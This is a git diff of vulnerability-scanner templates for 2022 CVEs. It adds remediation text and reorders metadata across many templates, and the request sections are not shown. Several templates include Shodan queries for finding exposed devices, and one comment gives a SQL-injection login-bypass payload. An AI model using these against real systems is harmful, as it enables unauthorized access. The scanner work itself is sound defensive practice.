wordpress tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy http: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index eb5dc9dc4f..90f732d091 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256. + remediation: | + Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html - https://github.com/omarhashem123/CVE-2022-31499 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-31499 cwe-id: CWE-78 epss-score: 0.17666 - cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.95449 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"eMerge" verified: true + max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware + shodan-query: title:"eMerge" tags: packetstorm,cve,cve2022,emerge,rce http: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 7f2d3969e3..aedacf04fa 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations. reference: - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd - https://www.vmware.com/security/advisories/VMSA-2022-0021.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-31656 cwe-id: CWE-287 epss-score: 0.92696 - cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* epss-percentile: 0.98631 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:-1250474341 verified: true + max-request: 1 vendor: vmware product: identity_manager + shodan-query: http.favicon.hash:-1250474341 tags: cve,cve2022,vmware,lfi http: diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 40644ba056..891dd7e923 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series. reference: - https://packetstormsecurity.com/files/167992/ - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-31798 cwe-id: CWE-384 epss-score: 0.00148 - cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.50097 + cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"eMerge" verified: true + max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware + shodan-query: http.title:"eMerge" tags: cve2022,emerge,nortek,xss,packetstorm,cve http: diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index e914c107db..ebcc7805fe 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + remediation: | + Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability. reference: - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-31814 cwe-id: CWE-78 epss-score: 0.96743 - cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* epss-percentile: 0.99511 + cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: - max-request: 2 verified: true - framework: pfsense + max-request: 2 vendor: netgate product: pfblockerng + framework: pfsense tags: packetstorm,cve,cve2022,pfsense,pfblockerng,rce,oast http: diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 4d56a42a8e..8ec9ceae2c 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-31845 cwe-id: CWE-668 epss-score: 0.00789 - cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* epss-percentile: 0.79334 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 vendor: wavlink product: wn535g3_firmware + shodan-query: http.html:"Wavlink" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 75d575667f..08e72d3d06 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-31846 cwe-id: CWE-668 epss-score: 0.00789 - cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* epss-percentile: 0.79334 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 vendor: wavlink product: wn535g3_firmware + shodan-query: http.html:"Wavlink" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 440f11315a..c916109adf 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-31847 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-31847 cwe-id: CWE-425 epss-score: 0.00794 - cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* epss-percentile: 0.79405 + cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 vendor: wavlink product: wn579x3_firmware + shodan-query: http.html:"Wavlink" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 6b4f32d5b0..93cff57e53 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patch or upgrade to a patched version of Codoforum. reference: - https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip - https://codoforum.com @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-31854 cwe-id: CWE-434 epss-score: 0.062 - cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* epss-percentile: 0.92636 + cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 vendor: codologic product: codoforum tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 260d2f93d6..61eb517636 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31879 cwe-id: CWE-89 epss-score: 0.0501 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.9185 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index 6e076ea57e..cfd7732726 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-1.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31974 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 4671f4a723..53c9d07c13 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-2.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31975 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index e473589f1d..653f5b5a8d 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31976 cwe-id: CWE-89 epss-score: 0.01144 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.82961 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 1335eb969f..8c24d5e57d 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-3.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31977 cwe-id: CWE-89 epss-score: 0.01144 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.82961 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index b6df63d585..86c7ce3dcc 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry. + remediation: | + To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-5.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31978 cwe-id: CWE-89 epss-score: 0.01144 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.82961 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index 8fb6c344a4..c3027d5dcd 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31980 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 940132f8eb..174daa5ef6 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31981 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 1e4310b2f2..9427a0d5d3 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31982 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index 68420a085d..e4e1202502 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31983 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index f9cb81a968..4f1b8b2d9e 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=. + remediation: | + To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-31984 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system tags: cve,cve2022,sqli,online-fire-reporting diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index 223c1cdcf7..ee862428ec 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32007 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-32007 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: complete_online_job_search_system_project product: complete_online_job_search_system tags: cve,cve2022,sqli,eris,authenticated diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index fab150e70f..6fda44fe6e 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-32015 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: complete_online_job_search_system_project product: complete_online_job_search_system tags: cve,cve2022,sqli,jobsearch diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index bbd027dd25..ef6432d2d2 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-32018 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: complete_online_job_search_system_project product: complete_online_job_search_system tags: cve,cve2022,sqli diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 1ca0b0cfb6..86d4079056 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32022 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-32022 cwe-id: CWE-89 epss-score: 0.00773 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.79045 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.html:"Car Rental Management System" verified: true + max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"Car Rental Management System" tags: cve,cve2022,carrental,cms,sqli,login-bypass http: diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 2bdcdb0d2b..75dd5560fa 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-32024 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" verified: true + max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"Car Rental Management System" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index ffcae1490b..2a1648cb24 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental 